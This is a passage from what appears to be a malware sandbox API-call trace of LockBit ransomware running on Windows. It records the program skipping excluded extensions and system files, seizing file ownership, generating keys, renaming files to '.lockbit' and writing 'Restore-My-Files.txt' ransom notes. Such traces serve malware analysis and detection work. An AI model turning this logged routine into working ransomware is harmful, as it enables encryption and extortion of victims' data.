lpString2=".png") returned -1 [0085.521] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0085.521] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0085.521] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0085.522] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0085.522] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0085.522] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0085.522] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0085.522] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0085.522] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0085.522] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0085.522] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0085.522] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0085.522] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0085.522] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0085.522] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0085.522] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0085.522] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0085.522] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.522] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0085.522] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0085.522] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0085.523] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0085.523] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0085.523] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0085.523] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0085.523] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0085.523] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0085.523] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0085.523] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0085.523] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0085.523] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0085.523] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0085.523] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0085.523] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0085.523] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0085.523] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.523] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0085.523] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0085.523] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0085.524] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0085.524] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0085.524] lstrcmpiW (lpString1="ntldr", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0085.524] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0085.524] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0085.524] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0085.524] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationUp_SelectionSubpicture.png") returned 1 [0085.524] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationUp_SelectionSubpicture.png") returned -1 [0085.524] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\") returned="" [0085.524] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_SelectionSubpicture.png") returned=".png" [0085.524] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0085.524] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0085.524] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0085.524] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0085.524] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0085.524] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0085.524] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0085.524] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0085.524] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0085.524] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0085.525] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0085.525] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0085.525] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0085.525] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0085.525] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0085.525] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0085.525] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0085.525] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0085.525] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0085.525] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0085.525] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0085.525] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0085.525] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0085.525] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0085.525] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0085.525] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0085.525] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0085.525] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0085.525] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_SelectionSubpicture.png.lockbit") returned 94 [0085.525] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.526] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0085.527] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0085.527] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0085.527] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0085.527] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0085.527] RtlFreeAnsiString (AnsiString="\\") [0085.527] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b8) returned 0x0 [0085.527] malloc (_Size=0x200) returned 0x77d800 [0085.527] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0085.528] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.528] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.528] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.528] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.529] CloseHandle (hObject=0x3b8) returned 1 [0085.529] free (_Block=0x77d800) [0085.529] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0085.529] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0085.529] malloc (_Size=0x40068) returned 0x1fb18c0 [0085.529] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=3081) returned 1 [0085.529] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.530] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0085.530] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.530] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.530] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0085.530] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0085.532] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_SelectionSubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0085.532] malloc (_Size=0xd2) returned 0x77d800 [0085.532] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xd2, FileInformationClass=0xa) returned 0x0 [0085.533] free (_Block=0x77d800) [0085.533] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push") returned 1 [0085.533] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\Restore-My-Files.txt") returned 70 [0085.533] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.533] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f2f02aa, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f2f02aa, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee4ccd1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x5e02, dwReserved0=0x0, dwReserved1=0x0, cFileName="push.png", cAlternateFileName="")) returned 1 [0085.533] lstrcmpiW (lpString1=".", lpString2="push.png") returned -1 [0085.534] lstrcmpiW (lpString1="..", lpString2="push.png") returned -1 [0085.534] PathFindExtensionW (pszPath="push.png") returned=".png" [0085.534] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0085.534] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0085.534] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0085.534] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0085.534] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0085.534] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0085.534] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0085.534] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0085.534] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0085.534] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0085.534] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0085.534] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0085.534] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0085.534] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0085.534] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0085.534] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0085.534] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0085.535] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0085.535] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0085.535] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0085.535] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0085.535] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0085.535] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0085.535] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0085.535] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.535] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0085.535] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0085.535] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0085.535] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0085.535] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0085.535] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0085.535] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0085.535] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0085.535] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0085.535] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0085.535] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0085.535] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0085.536] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0085.536] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0085.536] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0085.536] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0085.536] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0085.536] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.536] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0085.536] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0085.536] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0085.536] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0085.536] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="push.png") returned 1 [0085.536] lstrcmpiW (lpString1="ntldr", lpString2="push.png") returned -1 [0085.536] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="push.png") returned -1 [0085.536] lstrcmpiW (lpString1="bootsect.bak", lpString2="push.png") returned -1 [0085.536] lstrcmpiW (lpString1="autorun.inf", lpString2="push.png") returned -1 [0085.536] lstrcmpiW (lpString1="thumbs.db", lpString2="push.png") returned 1 [0085.536] lstrcmpiW (lpString1="iconcache.db", lpString2="push.png") returned -1 [0085.536] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\") returned="" [0085.536] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push.png") returned=".png" [0085.537] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0085.537] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0085.537] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0085.537] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0085.537] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0085.537] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0085.537] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0085.537] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0085.537] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0085.537] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0085.537] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0085.537] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0085.537] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0085.537] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0085.537] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0085.537] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0085.537] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0085.537] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0085.538] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0085.538] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0085.538] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0085.538] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0085.538] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0085.538] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0085.538] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0085.538] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0085.538] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0085.538] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0085.538] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push.png.lockbit") returned 66 [0085.538] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\push.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.539] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0085.539] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0085.539] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0085.539] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0085.539] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0085.540] RtlFreeAnsiString (AnsiString="\\") [0085.540] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3bc) returned 0x0 [0085.540] malloc (_Size=0x200) returned 0x77d800 [0085.540] NtQueryInformationToken (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0085.540] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.540] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0085.540] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.540] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0085.541] CloseHandle (hObject=0x3bc) returned 1 [0085.541] free (_Block=0x77d800) [0085.541] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\push.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0085.541] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0085.541] malloc (_Size=0x40068) returned 0x3db00b8 [0085.542] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3db00d0 | out: lpFileSize=0x3db00d0*=24066) returned 1 [0085.542] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.543] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.543] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00ec, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00ec) returned 0x0 [0085.543] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0085.543] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0085.544] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df00fc, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df00fc) returned 0x0 [0085.544] ReadFile (in: hFile=0x3bc, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 1 [0085.549] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0085.549] malloc (_Size=0x9a) returned 0x77d800 [0085.549] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0x9a, FileInformationClass=0xa) returned 0x0 [0085.550] free (_Block=0x77d800) [0085.550] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push") returned 1 [0085.550] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\Restore-My-Files.txt") returned 70 [0085.550] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0085.550] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f3ae97b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f3ae97b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee4ccd1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb92, dwReserved0=0x0, dwReserved1=0x0, cFileName="pushplaysubpicture.png", cAlternateFileName="")) returned 1 [0085.550] lstrcmpiW (lpString1=".", lpString2="pushplaysubpicture.png") returned -1 [0085.550] lstrcmpiW (lpString1="..", lpString2="pushplaysubpicture.png") returned -1 [0085.550] PathFindExtensionW (pszPath="pushplaysubpicture.png") returned=".png" [0085.550] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0085.550] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0085.550] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0085.550] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0085.550] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0085.550] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0085.551] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0085.551] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0085.551] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0085.551] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0085.551] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0085.551] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0085.551] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0085.551] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0085.551] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0085.551] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0085.551] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0085.551] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0085.551] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0085.551] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0085.551] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0085.551] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0085.551] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0085.551] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0085.552] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0085.552] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0085.552] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0085.552] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0085.552] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0085.552] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0085.552] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0085.552] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0085.552] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0085.552] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0085.552] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0085.552] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0085.552] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0085.552] lstrcmpiW 